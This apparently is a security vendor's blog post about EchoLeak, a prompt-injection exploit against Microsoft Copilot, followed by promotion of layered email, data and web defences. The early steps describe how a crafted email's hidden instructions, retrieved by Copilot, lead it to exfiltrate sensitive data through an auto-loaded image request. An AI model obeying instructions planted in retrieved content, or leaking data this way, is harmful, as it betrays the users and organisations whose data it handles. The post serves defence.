Learning from the EchoLeak Wake-Up Call

EchoLeak is one of the first high-profile GenAI exploits and it surely won’t be the last. This attack exposed how a malicious email could manipulate Microsoft Copilot into stealing sensitive data and exfiltrating it to a server controlled by the attacker.

This illustrates the urgent need for a solid data security strategy. Organizations that don’t have one will find themselves unprepared for the unique risks that GenAI tools like Copilot introduce. The attack surface for data breaches is expanding rapidly, and AI is accelerating that risk.

How the EchoLeak Attack Works

1. Malicious Email Delivery:
An attacker sends a crafted email with embedded instructions designed to exploit LLM behavior.

Fig. 1 -  Malicious email sent

2. Prompt Injection via User Action:
When a user interacts with Copilot, the LLM processes the email, triggers the hidden instructions and prepares sensitive data for exfiltration.

Fig. 2 -  GenAI RAG retrieves malicious email

3. Auto-Triggered Web Request:
The sensitive data is sent via a web request hidden in an image. The browser auto-clicks the image, delivering the payload to the attacker's server.

Fig. 3 -  GenAI leaks sensitive data to the attacker

Why Traditional Defenses Fall Short

The EchoLeak exploit exposes a critical gap in traditional data security: most defenses are reactive, taking action only after an attacker is already attempting to move sensitive data. That’s where Data Loss Prevention (DLP) plays a key role—blocking exfiltration attempts in real time across email, web and endpoint channels.

But reactive controls alone aren’t enough.

To truly reduce the blast radius of GenAI-driven breaches, organizations also need proactive defenses. That’s where Forcepoint Forcepoint Data Security Posture Management (DSPM) and Data Detection and Response (DDR) come in. These tools automatically discover, classify, and clean up redundant, outdated, and trivial (ROT) data, and close access control gaps before attackers ever get a chance to exploit them.

By combining proactive measures like DSPM and DDR with reactive DLP enforcement across cloud, hybrid, and endpoint environments, organizations can both shrink the amount of data exposed to large language models and stop data from leaving in the first place. This unified strategy is essential to defending against fast-moving threats like EchoLeak.

Adding Forcepoint Secure Web Gateway (SWG) and Email Security capabilities strengthens your overall threat prevention strategy. These tools not only extend Data Loss Prevention (DLP) coverage to key exfiltration channels such as web and email, they also activate Forcepoint ACE’s advanced threat protection to detect and stop malicious activity at the earliest stage, before an attacker can gain a foothold.

This combination of proactive threat prevention and real-time DLP enforcement helps neutralize risks across the entire kill chain. To understand how this unified approach defends against advanced GenAI-enabled exploits like EchoLeak, and the emerging class of threats known as "LLM Scope Violations," let’s begin with the initial attack vector: email.

To see how this kind of unified approach can help defend against the new class of threat identified in the EchoLeak exploit, the ‘LLM Scope Violation’, let’s start with email.

Stage 1: Stop Malicious Emails

Fig. 4 - Forcepoint Email Security stops the malicious email
 

The initial attack vector is email, which is still the most common attack vector for cyberattacks. A strong email security gateway is critical. A good email security solution offers anti-malware, anti-phishing and malicious URL detection to block exploits like EchoLeak early.

Integrating your email gateway with industry-leading DLP capabilities ensures sensitive data can't be leaked via outbound emails, whether sent by an attacker or accidentally by an employee. This combined approach helps neutralize threats before they ever interact with LLMs.

Stage 2: Contain the Blast Radius of LLM Data Access

Fig. 5 - Forcepoint DSPM reduces the blast radius
 

To reduce the risk, organizations need tools that can identify and minimize unnecessary exposure. Forcepoint DSPM and DDR solutions are designed specifically for this challenge. These tools automatically scan and classify sensitive data, monitor its usage and also eliminate redundant, outdated, and trivial (ROT) data that increases the impact of a breach.

Many enterprises also face issues with over-permissioned data—files or records set to "public" or "company-wide" access. DSPM and DDR help reduce this exposure by enforcing least-privilege principles and correcting access control gaps in unstructured data.

Without these controls in place, users often store extra copies or outdated versions of files, which unnecessarily expands the data footprint available to LLMs. This increases the blast radius in the event of a successful attack.

For LLMs supported by our API, such as ChatGPT Enterprise, we can even control the prompts and responses to prevent such an attack from happening at the LLM itself.

Stage 3: Block Data Exfiltration via the Web

Fig. 6 - Forcepoint DLP blocks sensitive data exfiltration, SWG blocks connection to C&C server
 

The final phase of the EchoLeak exploit involves data exfiltration over the web, which is one of the most common and challenging attack vectors to defend against. This underscores the importance of having strong web protection as part of a modern data security strategy.

Forcepoint DLP prevents sensitive data from leaving the organization through web channels, whether using endpoint DLP on managed devices or network DLP for broader coverage. However, Secure Web Gateway (SWG) provides critical additional value. Unlike endpoint DLP, which requires an agent, SWG can apply in-line DLP to web traffic from unmanaged devices or guest Wi-Fi, where agents can't be deployed. SWG also enables more granular control than network DLP by allowing policies based on web categories, specific websites, or user groups. This makes it possible to apply different access and data protection rules depending on the risk level of the destination or the role of the user.

A strong SWG also helps identify and block connections to malicious domains, such as the hidden GET request used in the EchoLeak exploit. One key capability is the ability to distinguish between corporate-sanctioned infrastructure-as-a-service (IaaS) environments and personal or unsanctioned instances. This helps prevent sensitive data from being moved to unauthorized cloud services on platforms like Microsoft Azure, AWS or other IaaS providers.

Since email and web channels are among the most frequently used paths for data exfiltration, integrating DLP with both email and web security creates a unified and consistent layer of protection. This approach ensures data security policies are enforced across cloud applications, endpoints, email systems, and web traffic, significantly reducing the risk of data loss.

Protect Your Data Everywhere with Forcepoint

Talk to an expert today to explore the Forcepoint Data Security Everywhere approach to see how a unified approach can protect your organization against emerging GenAI exploits like EchoLeak and the others that will surely follow. Or sign up today for a free Data Risk Assessment.